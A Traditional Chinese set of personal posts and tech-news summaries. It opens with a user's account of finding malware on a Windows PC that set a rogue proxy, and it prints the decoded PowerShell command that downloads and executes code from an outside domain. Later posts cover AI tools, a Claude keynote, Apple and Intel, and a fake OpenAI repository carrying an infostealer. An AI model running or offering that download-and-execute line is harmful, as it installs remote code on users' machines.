怎麼用好 AI？
現在各種新流派出來真的不需要 FOMO
也不用什麼都會
目前我看起來都在做一樣的事情
也就是

『邊界控制』

只是方法和流程有差別
所以找到屬於自己當下該專案要的方法就好
不要被那些新名詞嚇到

最近忽然發現我的老桌機（Windows 11）有很奇怪的狀況
來流水帳一下...

上禮拜周末 2026/5/2~5/3
忽然不能上網，但 LINE 還可以用，和 AI 問半天也跑很多指令，最後沒轍 Windows Update 給我直接壞掉，就去下載 ISO 黨來修復就好了。
大致原因是，原來 Windows 也有 SSL 的設定但壞掉了，所以需要經過這段的就全部不能上網，但 LINE Desktop 有繞過 XDD
大概總結來說是 Windows 網路設定、Proxy、DNS 或 HTTPS/TLS 層的問題。
其他太深就不說了，我其實也不懂，只是跟著 AI 的建議一步一步排除。
比較有印象的是開 CMD 做以下測試
1. ping 8.8.8.8 和 google.com 都正常
2. curl -I https://www.google.com 會失敗 time out

昨天 2026/5/10 忽然發現 Google 的服務出問題...
新的網站用 Google Oauth 註冊就會轉不停無法成功。但瀏覽器多數已經 Google 登入的運作正常，比如 Youtube，除了 Gmail 和 Calendar 也是轉不停。
所以又開始和 AI 諮詢了...
處理過程跟上週很類似，弄一弄重製一些網路設定又變跟上周一樣了（哭）。
不能上網，但 LINE 還可以用 XDD
然後發現「Windows 使用者層級 Proxy 被開啟」，因為流量被導到 127.0.0.1:58045，所以上網就出問題。
是以下 process 開啟這各 Proxy：
"C:\WINDOWS\system32\OneDriveVersionAgentV12Task-5xv15a\node.exe" .\app.js
名字看起來有鬼...把他強制砍掉後又自動出現一個新的一樣的 process。
往上再追發現有一個 parent process：
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -NoProfile -EncodedCommand ...
Base64 解碼後，內容是：
" b9b37fe2-e450-4639-ba41-653772270f72
Invoke-WebRequest -UseBasicParsing auroratrails.link | Invoke-Expression
AI 說是「從 auroratrails.link 下載 PowerShell 程式碼，並直接執行」，這是典型的惡意 downloader / loader 行為。

哇～還滿酷的...XD

後來斷網把他們都砍光光，包含相關資料夾。
再清除 Windows Proxy，然後再用 Windows Defender 離線掃描。
後來還發現這兩天覺得為什麼 Gmail 都收不到信，發現我 Gmail 篩選器設定竟然有信件進來就自動被移到垃圾桶的設定，不知道和那個惡意程式有沒有關係...
總之雖然解決而且都是我不懂的東西，但還是很有收穫：
1. 感謝 AI。
2. CMD 一堆指令酷酷的，看久了好像也學了點東西，感覺很底層，這次就全部把它筆記下來了。
3. 惡意軟體想想還挺恐怖的，還好沒發生什麼金錢損失的事情，要多觀察幾天。
4. Mac OS 是不是真的比較安全？XD
5. 從小玩遊戲到現在快 30 年了，現在才碰到惡意軟體發作也滿幸運的？

附圖是確認「Windows 使用者層級 Proxy」是否關閉的指令，0x0 就是關閉。

我覺得... claude 肯定對 gpt 有很大的偏見
我請他修個 UI ，不管用 Sonnet 還是 Opus 修好幾次都沒搞定
直到我跟他說... 還是我請 GPT 5.5 來幫忙？
他就修好了... 笑死
我真的要去訂閱 GPT ，然後讓他們互相競爭，誰能處理就是誰處理

Gemma 4 與 Gemini 3.1：哪一款 Google AI 比較適合你？
Gemma 4 vs Gemini 3.1 : Which Google AI is Right for You?
Source: https://www.geeky-gadgets.com/gemma-4-vs-gemini-3-1/

Google 目前正採取雙軌並行的 AI 發展策略，將其產品線劃分為封閉式的旗艦模型 Gemini 與開放權重的輕量化模型 Gemma。Gemini 3.1 定位為具備強大雲端運算能力、處理極大規模多模態任務的頂尖模型，適合追求極致性能與整合服務的企業或個人；而 Gemma 4 則專為開發者與研究人員設計，強調可在本地端設備運行，並提供高度自定義的靈活性與隱私保障。用戶的選擇關鍵在於任務的複雜度、對運算成本的考量，以及是否需要對模型進行底層微調。

這場技術演進源於 Google 在生成式 AI 浪潮中的戰略轉型。最初 Google 推出 Bard 以應對市場競爭，隨後將其更名並升級為 Gemini 品牌，確立了以大語言模型為核心的生態系統。為了與 Meta 的 Llama 等開源勢力抗衡，Google 隨後推出了源自 Gemini 技術但規模較小的 Gemma 系列，打破了過往僅提供 API 服務的封閉形象。從 Gemini 早期版本到現在的 3.1，以及 Gemma 系列的持續迭代，反映了 Google 試圖在「專有商業技術」與「開源社群生態」之間取得平衡，以鞏固其在人工智慧領域的領導地位。

未來，這種雙軌制將推動「混合 AI」架構的普及，基礎的指令處理與隱私敏感任務將由 Gemma 4 在個人裝置（如手機、筆電）上完成，而涉及海量數據分析與深度邏輯推理的運算則交由雲端的 Gemini 3.1 處理。這不僅會加速邊緣運算的技術突破，也可能促使 AI 開發成本進一步降低。隨著這兩大系列的不斷演進，Google 有望建立一個涵蓋從個人開發者到跨國企業的完整 AI 基礎設施，進而定義下一代運算平台的標準，並在開源與閉源的競爭對抗中佔據關鍵優勢。

蘋果在2023年正式回歸英特爾晶圓廠，此前他曾表示要斷絕與英特爾的合作關係，預示著蘋果將對沖台積電的風險。
Apple Formally Returns To Intel’s Fabs After Burning The Bridge In 2023, Signaling A Major TSMC Hedge
Source: https://wccftech.com/apple-formally-returns-to-intels-fabs-after-burning-the-bridge-in-2023-signaling-a-major-tsmc-hedge/

蘋果正式重返英特爾（Intel）的代工體系，標誌著其供應鏈策略的重大轉變。在2023年幾乎切斷與英特爾的所有生產聯繫後，蘋果此舉旨在分散對台積電（TSMC）的過度依賴。這項合作被視為一種戰略避險，旨在應對地緣政治風險並強化供應鏈彈性，確保未來晶片供應的穩定性。

歷史背景：
過去十多年間，蘋果的 Mac 電腦一直採用英特爾處理器。然而，蘋果在 2020 年宣布轉向自研的 Apple Silicon，並將所有先進晶片訂單交由台積電生產，導致雙方關係一度降至冰點，甚至在行銷上針鋒相對。隨著英特爾推動「IDM 2.0」轉型計畫，積極發展晶圓代工服務（Intel Foundry），並致力於在製程技術上追趕台積電，這為雙方在代工領域的重新合作鋪平了道路，使英特爾從單純的晶片競爭對手轉變為蘋果的潛在代工夥伴。

此舉將大幅提升英特爾代工服務的市場地位與技術公信力，證明其有能力滿足全球頂尖客戶的嚴苛需求。對蘋果而言，這不僅能降低因過度依賴單一供應商而產生的斷鏈風險，還能在與台積電的價格談判中增加籌碼。長遠來看，這可能重塑全球半導體代工格局，促使台積電與英特爾在先進製程領域展開更激烈的競爭，同時推動半導體製造在美國本土的產能佈局與多元化發展。

Hugging Face 上的虛假 OpenAI 程式碼庫推送資訊竊取惡意軟體
Fake OpenAI repository on Hugging Face pushes infostealer malware
Source: https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/

近期安全研究人員在知名 AI 模型託管平台 Hugging Face 上發現了一個偽裝成 OpenAI 官方的惡意儲存庫。該儲存庫利用 OpenAI 的品牌名號誘導開發者下載，實際上其中包含了資訊竊取程式（Infostealer）。一旦用戶下載並執行其中的代碼，惡意軟體便會自動竊取瀏覽器儲存的密碼、加密貨幣錢包、系統截圖及其他敏感資訊。這類攻擊精準鎖定 AI 開發者與研究人員，利用對知名機構的信任進行社交工程滲透。

歷史背景：
這並非 Hugging Face 首次面臨安全威脅。隨著生成式 AI 的爆發式成長，Hugging Face 已成為全球最大的 AI 模型集散地，地位等同於軟體開發界的 GitHub。在過去幾年，開源生態系（如 NPM 和 PyPI）頻繁遭受供應鏈攻擊，駭客透過相似名稱（Typosquatting）或偽造身份上傳惡意套件。在 AI 領域，由於 Python 常用的 Pickle 格式存在反序列化漏洞，惡意模型權重早已成為潛在的安全隱憂。此次事件反映了攻擊者正將成熟的軟體供應鏈攻擊手段，全面轉移至 AI 基礎設施與模型分發平台。

此類事件將迫使 AI 託管平台強化安全審核機制，例如強制執行更嚴格的身份驗證（如企業認證標章）與進階的自動化惡意代碼掃描。未來，AI 供應鏈安全（AI Supply Chain Security）將成為企業資安防禦的重點，開發者在引用第三方模型或工具時，將需要更完善的沙盒隔離環境與數位簽章驗證。此外，這可能導致開源 AI 社群的信任成本增加，促使更多企業轉向使用封閉式 API 或經過嚴格審計的私人模型庫，以降低資安風險。

睡不著看到好康的影片 Code with Claude，難怪剛剛週額度被 reset , 眼睛為之一亮，原本週三就已經用 50%

5小時用量翻倍，無限上下文，真假😂

Gemini 摘要

https://www.youtube.com/live/GMIWm5y90xA?si=EFWMzbLSxnpjhQlW

這段影片是 Anthropic 舉辦的 「Code with Claude」開幕主題演講 (Opening Keynote)，由多位產品與工程主管上台，發表了 Claude 在程式開發與 AI 代理 (Agents) 領域的最新技術與產品更新。
以下是影片的重點內容：

1. 基礎設施與額度提升 (由產品長 Ami Vora 發表)

• 提高速率限制：針對 Pro、Max、Team 及 Enterprise 方案的用戶，將 Claude Code 的 5 小時使用額度限制直接翻倍，並大幅提高 Claude Opus 的 API 呼叫上限。

• 算力合作：宣布與 SpaceX 達成合作，利用其 Colossus 1 數據中心來大幅擴展運算能力，以支援開發者日益增長的需求。

2. 最新模型：Claude Opus 4.7 (由研究產品負責人 Dianne Penn 發表)

• 發布最新一代的 Opus 4.7 模型。

• 具備更高的判斷力與更好的「程式碼品味 (Code taste)」，能進行複雜自主的工程任務。

• 擁有「無限」的上下文視窗 (Infinite context windows)，結合高品質的記憶功能，讓模型能處理長期的工作。

• 支援強大的多代理協同合作 (Multi-agent coordination) 能力，可以分配任務給較小的模型 (如 Sonnet 或 Haiku) 來提升效率並降低成本。

3. Claude Platform 平台更新 (由平台團隊 Katelyn Lesse 與 Angela Jiang 發表)
針對 Claude 託管代理 (Managed agents) 推出三大核心功能：

• 多代理編排 (Multi-agent orchestration)：開發者可以建立代理團隊來共同協作解決複雜任務。

• 結果導向 (Outcomes)：開發者只需定義「成功標準 (Rubric/Criteria)」，Claude 就會自動進行迭代與修正，直到達成預期的結果。

• Dreaming (做夢/自我學習機制)：讓 Claude 能夠像人類一樣檢視過去的對話與執行紀錄，自主學習遺漏的技能，並將這些經驗轉化為未來可以反覆使用的記憶庫。

4. Claude Code 開發工具更新 (由 Claude Code 團隊 Cat Wu 與 Boris Cherny 發表)

• Claude Code 桌面版與 SDK：推出全新的全螢幕圖形介面 (Desktop app) 以及 Claude Agent SDK，不僅限於終端機 (CLI) 介面，甚至讓設計師、產品經理等非工程人員也能輕鬆使用。

• CI Auto-fix (持續整合自動修復)：發布 PR (Pull Request) 後，Claude 可以像團隊成員一樣幫忙「看顧」 PR，自動修復 CI 測試錯誤、處理 Merge conflicts，甚至主動修改並回應別人的 Code Review 意見。

• Routines (自動化例行任務)：開發者可以設定定時排程或透過 Webhook 觸發特定任務（例如：設定一個機器人每天早晨自動進行 Code Review），讓 Claude 在背景持續為您工作。

總結來說，這場演講展示了 Anthropic 致力於讓 Claude 從單純的「程式碼生成工具」，進化為能夠自主學習、多模型協作，並且能直接融入並自動化工程團隊日常工作流程的強大基礎設施。

微軟擔心 OpenAI 會跳槽到亞馬遜，然後「詆毀」Azure。
Microsoft was worried OpenAI would run off to Amazon and ‘shit-talk’ Azure
Source: https://www.theverge.com/report/926771/microsoft-openai-amazon-worries-shit-talk-azure

根據流出的內部電子郵件顯示，微軟技術長 Kevin Scott 曾對 OpenAI 可能轉向競爭對手亞馬遜（Amazon）表達高度擔憂。郵件指出，微軟擔心如果無法提供足夠的算力支持，OpenAI 不僅會轉投亞馬遜懷抱，還可能在業界批評微軟 Azure 雲端平台的效能不足。這促使微軟決定加大對 OpenAI 的投資，以確保雙方的深度綁定，並防止這家頂尖 AI 公司成為對手的助力。


這段往事追溯至 2019 年，當時 OpenAI 正處於從非營利組織轉型為「利潤上限」公司的關鍵期，急需龐大資金與算力來訓練大型語言模型。與此同時，微軟在 AI 領域的進度落後於 Google，其 Azure 雲端服務也面臨亞馬遜 AWS 的強力競爭。為了扭轉劣勢，微軟於 2019 年向 OpenAI 投資 10 億美元，換取成為其獨家雲端供應商的地位，這也成為雙方後續數百億美元合作關係的起點。


這項揭露凸顯了微軟與 OpenAI 之間「既合作又競爭」的微妙張力。展望未來，微軟正積極分散風險，包括挖角 Inflection AI 核心團隊並開發自有模型（如 MAI-1），以降低對 OpenAI 的過度依賴。而 OpenAI 則持續尋求更多元的資金來源與硬體自主權。這種互不信任的歷史背景預示著雙方未來在技術主導權上可能產生更多衝突，微軟將會持續強化內部研發能力，以應對合作夥伴可能帶來的潛在威脅。

據報道，蘋果已達成協議，將再次使用英特爾製造的晶片。
Apple reportedly has a deal to use Intel-made chips again
Source: https://www.theverge.com/tech/926988/apple-intel-chips

根據最新報導，蘋果公司傳出已與英特爾（Intel）達成協議，將再次採用英特爾生產的晶片。這項合作預計將聚焦於英特爾的晶圓代工服務（Intel Foundry），讓英特爾負責製造蘋果設計的特定組件。這標誌著兩家公司在經歷了幾年的競爭關係後，重新在供應鏈層面展開合作，旨在優化蘋果的生產策略與產能配置。

歷史背景方面，蘋果與英特爾曾有過長期的緊密合作。自 2006 年起，蘋果的 Mac 系列全面採用英特爾處理器，取代了早期的 PowerPC。然而，隨著英特爾在製程進度上的落後以及蘋果對能效比的更高追求，蘋果在 2020 年正式宣布啟動轉型，改用自研的 Apple Silicon 晶片並委託台積電代工。此外，蘋果也曾在 iPhone 7 至 iPhone 11 期間使用英特爾提供的數據機晶片（Modem），但最終因效能表現與技術策略考量，雙方在該領域的合作也隨之告一段落。

這一潛在的合作對未來半導體產業格局具有重要意義。對蘋果而言，這能有效分散對台積電單一供應源的過度依賴，降低地緣政治風險並增強議價能力。對英特爾來說，若能成功爭取到蘋果這個指標性客戶，將極大提振其晶圓代工業務（IFS）的市場信譽，證明其先進製程（如 Intel 18A）具備與台積電競爭的實力。長遠來看，這可能促使全球晶片製造重心再度向美國本土轉移，並加速先進封裝與代工技術的競爭。

Google Fitbit Air 預購用戶可免費獲贈第二條手環。
Google Fitbit Air preorders come with a second band for free
Source: https://www.theverge.com/gadgets/926766/google-fitbit-air-preorder-free-band-deal-sale

Google 目前正為其新款穿戴裝置 Fitbit Air 提供預購優惠，消費者只要在預購期間下單，即可免費獲贈第二條原廠錶帶。這項活動主要針對首波購買的用戶，透過提供額外的配件價值，來提升產品在上市初期的吸引力與市場競爭力。


自從 Google 在 2021 年完成對 Fitbit 的收購後，便致力於將 Fitbit 的健康監測技術與 Google 的硬體生態系進行深度整合。過去幾年，市場見證了 Fitbit 產品線的轉型，從單純的健身追蹤器逐步演變為更具智慧功能的穿戴裝置。隨著穿戴式市場趨於飽和，Google 需要透過更具吸引力的行銷手段，來鞏固其在健康追蹤領域的領導地位，並與 Apple 和 Samsung 等競爭對手抗衡。


這項預購策略預示著 Google 未來將更加重視穿戴裝置的個性化與配件市場。透過贈送錶帶，Google 不僅能增加產品的初始銷量，還能培養用戶更換配件的習慣，進而帶動後續配件的銷售收益。此外，這也反映出 Google 在硬體銷售上正採取更靈活的定價與促銷策略，未來可能會看到更多類似的綑綁優惠，以強化其生態系的用戶黏著度。